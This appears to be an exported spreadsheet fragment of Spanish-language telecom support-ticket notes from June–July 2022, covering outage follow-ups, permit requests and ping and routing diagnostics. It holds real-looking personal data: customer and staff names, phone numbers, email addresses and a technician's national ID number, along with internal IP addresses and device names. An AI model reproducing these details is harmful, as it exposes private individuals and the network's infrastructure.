-ID 3001117923</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MAURICIO NICARAGUA 86681118 SOLICITA LLAMAR EL DIA DE MAÑANA A LAS 10 AM. PARA REALIZAR PRUEBAS EN CONJUNTO YA QUE EL ENLACE CAE Y LEVANTA CONSTANTEMENTE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MAURICIO  86681118 MENCIONA QUE ESTA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA EN 1 MIN
-ID 3001109450</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAURICIO  86681118 MENCIONA QUE AUN NO HA LLEGADO A PR POR LO QUE SOLICITA LLAMADA A LAS 10:30
-ID 3001099111</t>
  </si>
  <si>
    <t>F4622141</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622141
ID:  IP2148020SV
IDENTIFICADOR DEL CLIENTE:  CC_APOYO_SV_LA_UNION
UBICADO EN:    LA UNIONBO. EL CENTRO3A. AVENIDA NTELOCAL 2-3
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4622148</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PDV AL 6643-6400  EXT 204 CONTESTA LA SEÑORITA KARINA RUSTRIAN Y BRINDA LOS SIGUIENTES DATOS **
HORARIO DE ATENCION: 7:00 A 17:00 HRS
GESTION DE PERMISOS: SE NECESITAN PERMISOS ENVIAR CORREO CON DATOS DEL PERSONAL TECNICO KIMBERLY.MEJICANOS@SOMOSCMI.COM  CON COPIA A ADA.RUSTRIAN@SOMOSCMI.COM
DIRECCCION: KM 30.5 CARRETERIA AL PACIFICO, A LA PAR DE COLONIA VILLA ALBORADA.
ATENDERA EN SITIO: SILVIA HERNANDEZ KARINA RUSTRIAN
-ID 3001061918
**</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO .// QUEDAMOS A LA ESPERA DE LA RESPUESTA
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 10:40
PARA: KIMBERLY.MEJICANOS@SOMOSCMI.COM &lt;KIMBERLY.MEJICANOS@SOMOSCMI.COM&gt;; ADA.RUSTRIAN@SOMOSCMI.COM &lt;ADA.RUSTRIAN@SOMOSCMI.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 795600008T | SISTEMAS Y EQUIPOS, S.A.
BUEN DÍA ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN:  GRANJA LOS JUANES, AMATITLAN - KM 30.5 CARRETERIA AL PACIFICO, COLONIA VILLA ALBORADA
ADJUNTAMOS LOS DATOS DEL TÉCNICO
RUBEN MIXAEL ALVARADO PEREZ 1603580430114
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4622186</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A TELMEX PARA QUE PUEDA BRINDAR AVANCES
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 15:15
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; 'HERNANDEZ CERVANTES SANTIAGO RAUL' &lt;SHCERVAN@UNINET.COM.MX&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; 'CNOC INTERNACIONAL' &lt;CNOC.INTL@UNINET.COM.MX&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: APERTURA DE TICKET DEL ENLACE K7N-M02388CL-CL3632-NP
*-*-*-*</t>
  </si>
  <si>
    <t>F4622213</t>
  </si>
  <si>
    <t>-* SE HABLA CON JUSTUS ALARCON 54138165 (CLIENTE) INFORMA QUE YA ESTA EN SITIO, SE REALIZA CONFERENCIA CON FRANCISCO QUEZADA (GESTOR) PARA VERIFICACIONES Y/O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>F4622214</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR OSWALDO HERNANDEZ INIDCA QUE SE PUEDE PROCEDER CON EL CIERRE YA QUE EL TICKET LO CERRO EL SEÑOR JULIO GONZALEZ DE SU LADO**
-ID 3001070645
**</t>
  </si>
  <si>
    <t>F4622230</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MARLENY HERNANDEZ 58333612 COMENTA QUE NO ESTÁ EN LAS INSTALACIONES PIDE QUE SE LLAME A LILIAN 59664690 PARA HACER PRUEBAS.
ID:3001072652</t>
  </si>
  <si>
    <t>LUEGO DE REINICIAR PBX SERVICIO RESTABLECE. CLIENTE MARLENY HERNÁNDEZ REALIZA PRUEBAS Y VALIDA EL E1 ACTIVO. PBX ESTABA INHIBIDA POR BAJÓN DE ENERGÍA EL DÍA DE AYER (SEGÚN COMENTÓ EL CLIENTE) CLIENTE AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 3001074147, 3001079009
PORT STATUS                                	= NORMAL
DEVICE NAME                                	= M00_GSCPGTDJN1T1_DON_JUSTO_CORP_COA0
NAME                                       	= FRAME:0/SLOT:2/PORT:5
ALIAS                                      	= 90001901048-CORPORACION PETENERA
LOOPBACK STATUS                            	= NO
SIGNALING MODE                             	= CCS
CRC4 FRAME VERIFY SWITCH                   	= DISABLE
LINE CODE MODE                             	= HDB3
IMPEDANCE                                  	= 75¿
WORKING MODE FOR DIGITAL SECTION ACCESS    	= DIGITAL SECTION ACCESS
L2 MONITORING SWITCH                       	= ON</t>
  </si>
  <si>
    <t>CLIENTE UBICA ASMI52 CON LAS SIGUIENTES LEDS, LO REINICIA PERO CONTINUA EN EL MISMO ESTADO, AHORA PROCEDE A REINICIAR PLANTA PANASONIC
ASMI52:
PWR  VERDE
TST   NARAJNA
ALM  ROJO
SYNC VERDE</t>
  </si>
  <si>
    <t>F4622256</t>
  </si>
  <si>
    <t>SE SOLICITAN AVANCES A PROVEEDOR
APERTURA ENLACE 405399</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE SOLICITANDO EL RFO, AÚN NO SE TIENE RESPUESTA DE PROVEEDOR TIGO; SE LES HACE RECORDATORIO DE NUEVO VÍA CORREO A ÉSTOS; Y SE RESPONDE CORREO DE CLIENTE INDICANDO QUE AÚN A LA ESPERA DE LA SOLICITUD.</t>
  </si>
  <si>
    <t>** JOSUE HERNANDEZ 00528183283675 (CLIENTE) CONFIRMA RECEPCIÓN DEL CORREO, AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>CASO ESCALADO CON PROVEEDOR TIGO, ÉSTOS ELABORARÁN RFO PARA LUEGO ENVIÁRSELO A CLIENTE PARA ASÍ DAR POR CERRADO EL TICKET.
ASUNTO: RE: CEMEX GUATEMALA || C-0060900101</t>
  </si>
  <si>
    <t>F4622261</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAFEL TOBAR 78595253 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001073151</t>
  </si>
  <si>
    <t xml:space="preserve">SE REVISA Y NO SE ALCANZA EL EQUIPO CPE A NIVEL WAN.
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN MAG 10.138.61.99
  PING 10.138.61.99: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.138.61.99 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.30.52
DISPLAY IP ROUTING-TABLE VPN-INSTANCE MAG 10.138.61.99
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : MAG
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.138.61.96/29  DIRECT  0    0             D   10.138.61.97    VLANIF2435			</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFEL TOBAR 78595253 NO RESPONDE, SE INTENTARA LUEGO**
-ID 3001146312
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAFEL TOBAR 78595253 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001137364</t>
  </si>
  <si>
    <t>NO SE ALCANZA EL SW SE NECESITA VALIDAR CON EL CLIENTE YA QUE LA INFORMACION EN EL SM ES POSIBLE QUE YA NO ESTE ACTUALIZADA SE PROCEDE A ENVIAR CORREO PARA VALIDAR CON EL CLIENTE SE COLOCA EL TTK EN PENDIENTE CLIENTE
 SW,10.136.63.213 		
&lt;TSANSVZ3N1D1EID1&gt;PING 10.136.63.213
  PING 10.136.63.213: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.136.63.213 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS</t>
  </si>
  <si>
    <t>SE LLAMA A LOS CONTACTOS BRINDADOS POR CORREO JUAN CRUZ  77932962 Y  LOS CUALES REPONDEN EN UNO  RAFAEL TOBAR 78595253 PERO LA PERSONA SE ENCONTRABA DORMIDA Y NO ME APOYO PARA PODER REALIZAR PRUEBAS  ME CORTO LA LLAMADA SE TRATO DE LLAMAR NUEVAMENTE AL CUAL NO RESPONDIO SE PORCEDE A DEJAR EN ETAPE PENDINTE CLIENTE Y VALIDAR EN HORARIO HABIL.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFEL TOBAR AL 78595253 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO**
ID 3001081846
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFEL TOBAR AL 78595253 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO**
ID 3001068237
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFEL TOBAR AL 78595253 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO**
ID 3001093048
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFEL TOBAR AL 78595253 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO**
ID 3001063030
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFEL TOBAR AL 78595253 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO**
ID 3001128130
**</t>
  </si>
  <si>
    <t>F4622312</t>
  </si>
  <si>
    <t>SE ENVIA CORREO  A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 8:45
PARA: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; SOC@SISAP.COM &lt;SOC@SISAP.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SEGUIMIENTO TTK SD1139924
BUEN DÍA
EN SEGUIMIENTO AL CASO SOLICITO DE SU APOYO EN VALIDAR COMO OBSERVA EL FUNCIONAMIENTO DEL SERVICIO, A NIVEL DE CLARO YA LO OBSERVAMOS OPERATIVO Y ESTABLE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t xml:space="preserve">SEGUN DISEÑIO SE ENCUENTRA OPERATIVO EL SW DE ACCESSO SE PROCEDE A VALIDAR CON CLIENTE YA QUE SE VALIDA QUE SE TUVO ALGUN INCONVENIENTE EN ESA AREA YA QUE HAY VARIOS TTK SOBRE EL AREA SE PROCEDE A VALIDAR PROBLEMAS DE ENERGIA EN EL PUNTO REMOTO
PING -Q -C 100 -S 100 -M 5 -VPN GESTION_EQ_HUAWEI 10.103.91.21
  PING 10.103.91.21: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.91.21 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/4/5 MS
RUTA IP:
PE: 10.179.28.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE GESTION_EQ_HUAWEI 10.103.91.21
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : GESTION_EQ_HUAWEI
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.103.91.21/32  DIRECT  0    0                 0.0.0.0         VLANIF3579	</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO ARDAVIN 55194520 MENCIONA QUE ES NUMERO EQUIVOCADO
-ID 3001074268</t>
  </si>
  <si>
    <t>F4622377</t>
  </si>
  <si>
    <t>*/*/*SE ASOCIA SD1139979 A F4622377*/*/*/</t>
  </si>
  <si>
    <t>F4622478</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 RESPONDEN PERO DEJAN EN ESPERA Y NO RETOMAN LA LLAMADA
-ID 3001078770</t>
  </si>
  <si>
    <t xml:space="preserve">EL ENLACE CONTINUA CAIDO ES NECESARIO REALIZAR PRUEBAS DE 1ER NIVEL EN EL CLIENTE SE PROCEDE A ENVIAR CORREO APRA VALIDAR DESCARTES DE 1 ER NIVEL
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN TELMEXBIMBO 187.128.10.110
  PING 187.128.10.110: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 187.128.10.110 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.30.52
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TELMEXBIMBO 187.128.10.110
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TELMEXBIMBO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
        0.0.0.0/0   IBGP    200  0             RD  10.192.65.89    100GE8/0/0			</t>
  </si>
  <si>
    <t xml:space="preserve">NO SE LLEGA A NIVEL WAN SE PROCEDE A DEJAR EN ETAP PENDINTE CLIENTE YA QUE FUE A FECTADO POR UNA RIR  5505171 SE VALIDARA NUEVAMENTE AL FINALIZAR ACTIVIDAD
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN TELMEXBIMBO 187.128.10.110
  PING 187.128.10.110: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 187.128.10.110 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.30.52
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TELMEXBIMBO 187.128.10.110
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TELMEXBIMBO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
        0.0.0.0/0   IBGP    200  0             RD  10.192.65.89    100GE8/0/0			</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE 52 55 5174 5299 CONTESTA LA SEÑORITA KARINA INDICA QUE DE SU LADO YA FUE CERRADO AUTORIZA CIERRE DE TICKET **
-ID 3001141359
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001132890 - 3001133071</t>
  </si>
  <si>
    <t>F4622481</t>
  </si>
  <si>
    <t>***--- TELMEX VALIDA EL FUNCIONAMIENTO DEL SERVICIO --*-*  SE LE CONSULTA SOBRE EL CIERRE ---*
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 30 DE JUNIO DE 2022 05:45
PARA: CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMCNOC073836 || ENLACES CAÍDO
GRACIAS POR LA CONFIRMACIÓN ESTIMADO SR. CASTAÑEDA.
                PODRÍA INDICARNOS SI PODRÍAMOS CERRAR LOS TICKETS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: CASTAÑEDA CUEVAS CARLOS EMILIO [MAILTO:CCCUEVAS@UNINET.COM.MX]
ENVIADO EL: JUEVES, 30 DE JUNIO DE 2022 05:42
PARA: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMCNOC073836 || ENLACES CAÍDO
ESTIMADOS,
SE CONFIRMAN SERVICIOS OPERATIVOS.
SALUDOS</t>
  </si>
  <si>
    <t>***--- SE CONSULTA VÍA SKYPE CON CNOC YA QUE TELMEX SOLICITA AVANCES PARA ESTA FALLA DE VARIOS ENLACES QUE REPORTO -*--*
DE: CASTAÑEDA CUEVAS CARLOS EMILIO [MAILTO:CCCUEVAS@UNINET.COM.MX]
ENVIADO EL: JUEVES, 30 DE JUNIO DE 2022 04:15
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMCNOC073836 || ENLACES CAÍDO
ESTIMADOS,
ESTAMOS A LA ESPERA DE SUS COMENTARIOS EN ESTE INCIDENTE.
SALUDOS
C. EMILIO CASTAÑEDA CUEVAS
OPER CIAP GESTION Y SOPORTE JR
CENTRO NACIONAL DE OPERACIÓN DE REDES DE CLIENTES
CORREO: CCCUEVAS@UNINET.COM.MX
TEL. +52 55 5174-5299
CORREO: CNOC.INTL@UNINET.COM.MX</t>
  </si>
  <si>
    <t>F4622483</t>
  </si>
  <si>
    <t>F4622484</t>
  </si>
  <si>
    <t>F4622486</t>
  </si>
  <si>
    <t>F4622487</t>
  </si>
  <si>
    <t>F4622490</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA VALIDACIONE DE LOS SERVICIOS REPORTADOS</t>
  </si>
  <si>
    <t>SERVICIO UP SIN PERDIDAS NI TIEMPOS ALTOS SE PROCEDE A VALIDAR CON EL CLIENTE Y SE COLOCA EN ETAPA PENDIENTE CLIENTE
RP/0/RSP0/CPU0:MAMANIVIFN1C1BED1#PING VRF INTERNET_NI_METRO 190.212.138.70 COUNT 1500 SI 1400
FRI JUN 24 08:13:35.441 GMT
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1500, 1400-BYTE ICMP ECHOS TO 190.212.138.70, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (1500/1500), ROUND-TRIP MIN/AVG/MAX = 1/1/72 MS
RP/0/RSP0/CPU0:MAMANIVIFN1C1BED1#</t>
  </si>
  <si>
    <t>F4622498</t>
  </si>
  <si>
    <t>***--- TELMEX SOLICITA ACCCIONES CORRECTIVAS E INDICA QUE SERVICIO ESTA ACTIVO --**  SE SOLICITA APOYO AL CNOC VÍA SKYPE --**
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: JUEVES, 30 DE JUNIO DE 2022 05:24
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 5446893 ::: TICKET CNOC IMBBL004420 ::: "ENLACE FUERA DE SERVICIO"
BUEN DIA TEAM
EL SERVICIO YA RESTABLECIÓ, QUEDAMOS AL PENDIENTE DE SABER SI SE REALIZARON ACCIONES CORRECTIVAS Y EL RFO.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>TICKET PENDIENTE POR ELABORACIÓN DE RFO, EN ESPERA DE LAS 48/72 HORAS HÁBILES; SE ESPERA TENERLO EN EL TRANSCURSO DE ESTA SEMANA.</t>
  </si>
  <si>
    <t>F4622542</t>
  </si>
  <si>
    <t>SE PORCEDE CON CIERRE POR ENERHGIA COMERCIAL YA UQE SE ENCUENTRA OKJ EL SERVICIO.
SE TIENE COMUNICACIÓN CON ROUTER DEL CLIENTE
CHI_6504_01#PING 192.168.186.134
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.168.186.134, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/3/4 MS
CHI_6504_01#</t>
  </si>
  <si>
    <t>F4622605</t>
  </si>
  <si>
    <t>SE MANDO CORREO AL CLIENTE SOLICITANDO LOS ACCESOS PARA EL PERSONAL ESTAMOS A LA ESPERA DE SU CONFIRMACIÓN
DE: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 9:58
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; RODRIGUEZ HERNANDEZ LAURA LILIA &lt;RHERNANL@UNINET.COM.MX&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL ICXN-00070OC::: TICKET CNOC IMVOL008008::: "MANOS REMOTAS"
BUEN DÍA ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO, PARA EL DÍA DE MAÑANA 01/07/2022 A LAS 11:30AM
ICXN-00070OC|| TELMEX USA || PARQUE EMPRESARIAL AEROCENTRO SEGUNDO PISO. DISTRITO 9, CANTON RIO SEGUNDO PROVINCIA DE ALAJUELA COSTA RICA
DATOS DEL TECNICO
DAVID NAVARRO  TX/ CORP. ID-111930872 PLACA 898101
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4622611</t>
  </si>
  <si>
    <t>CLIENTE YADIRA GALINDO 31860427 COMENTA QUE NO TIENE AUDIO EN SUS LLAMADAS, INDICA QUE AL MARCAR EL TELÉFONO SUENA PERO NO TIENE AUDIO, COMENTA QUE SUCEDE TANTO EN LLAMADAS EXTERNAS COMO EXTENSIONES INTERNAS, COMENTA QUE YA CONSULTÓ CON SU PROVEEDOR DE LA PBX Y NO VIERON INCONVENIENTE. SE ABRIRÁ PARA CERTIFICAR EL E1.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050431860427
NÚMERO: 0050431860427
INICIO: HOY, 07:56 A. M.
FIN: HOY, 08:00 A. M.
DURACIÓN: 3:12
ID DE LLAMADA: 3001064946</t>
  </si>
  <si>
